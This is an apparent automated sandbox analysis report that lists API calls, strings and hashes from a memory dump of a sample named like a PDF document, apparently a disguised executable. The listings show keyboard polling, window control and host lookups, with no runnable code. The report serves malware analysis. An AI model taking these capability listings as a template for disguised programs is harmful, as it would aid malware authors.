                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 1965227024-3771769585
                              • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                              • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: SendString$_memmove_wcslen
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 369157077-1007645807
                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                              APIs
                              • GetParent.USER32 ref: 00445BF8
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                              • __wcsicoll.LIBCMT ref: 00445C33
                              • __wcsicoll.LIBCMT ref: 00445C4F
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$ClassMessageNameParentSend
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 3125838495-3381328864
                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                              APIs
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$CharNext
                              • String ID:
                              • API String ID: 1350042424-0
                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                              • _wcscpy.LIBCMT ref: 004787E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 3052893215-2127371420
                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                              • __swprintf.LIBCMT ref: 0045E7F7
                              • _wprintf.LIBCMT ref: 0045E8B3
                              • _wprintf.LIBCMT ref: 0045E8D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-2354261254
                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __swprintf_wcscpy$__i64tow__itow
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 3038501623-2263619337
                              • Opcode ID: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                              • Opcode Fuzzy Hash: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                              • __swprintf.LIBCMT ref: 0045E5F6
                              • _wprintf.LIBCMT ref: 0045E6A3
                              • _wprintf.LIBCMT ref: 0045E6C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-8599901
                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                              APIs
                              • timeGetTime.WINMM ref: 00443B67
                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                              • IsWindow.USER32(00000000), ref: 00443C3A
                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                              • String ID: BUTTON
                              • API String ID: 1834419854-3405671355
                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                              • LoadStringW.USER32(00000000), ref: 00454040
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • _wprintf.LIBCMT ref: 00454074
                              • __swprintf.LIBCMT ref: 004540A3
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                              • API String ID: 455036304-4153970271
                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                              APIs
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                              • _memmove.LIBCMT ref: 00467EB8
                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                              • _memmove.LIBCMT ref: 00467F6C
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                              • String ID:
                              • API String ID: 2170234536-0
                              • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                              • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                              APIs
                              • GetKeyboardState.USER32(?), ref: 00453CE0
                              • SetKeyboardState.USER32(?), ref: 00453D3B
                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                              • GetKeyState.USER32(000000A0), ref: 00453D75
                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                              • GetKeyState.USER32(00000011), ref: 00453DEF
                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                              • GetKeyState.USER32(00000012), ref: 00453E26
                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                              APIs
                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                              • DeleteObject.GDI32(?), ref: 0047151E
                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                              • DeleteObject.GDI32(?), ref: 004715EA
                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
